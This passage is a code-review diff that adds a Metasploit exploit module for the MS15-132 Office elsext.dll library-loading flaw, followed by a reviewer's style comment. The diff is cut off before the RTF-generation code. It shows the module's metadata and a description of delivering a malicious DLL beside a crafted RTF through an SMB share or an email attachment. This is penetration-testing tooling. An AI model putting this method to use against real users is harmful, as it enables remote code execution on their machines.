modules/exploits/windows/fileformat/ms15_132_elsext_rtf.rb

```diff
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS15-132 Microsoft Office elsext.dll Library Loading",
+      'Description'    => %q{
+        This module exploits an arbitrary library loading in Microsoft Windows. By embedding an OLE
+        object in a document with a specific CLSID, it is possible to cause Windows to load
+        elsext.dll from the same directory as the document, and gain arbitrary remote code execution
+        under the context of the user.
+
+        To use this module, you must place the RTF and DLL in the same directory. An example of
+        hosting them is on a remote SMB share; or in a compressed folder and send it as an e-mail
+        attachment. And then the user must double click on the RTF file, which will allow the
+        malicious DLL to load automatically, and get code execution. Also, you must NOT change the
+        name of the DLL file.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'scvitti', # Discovery, PoCs
+          'sinn3r'   # MSF
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-6128'],
+          ['MSB', 'MS15-132'],
+          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=514']
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows', {}],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 09 2015", # Public disclosure. Originally reported on Sept 03 2015
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The RTF file', 'msf.rtf']),
+      ], self.class)
+  end
+
+  def generate_rtf
```

Comment:
Is there any benefit to keeping the RTF in a separate file given that you are just copying its contents around when the module runs?    Seems easier to just have `generate_rtf` just return the string directly.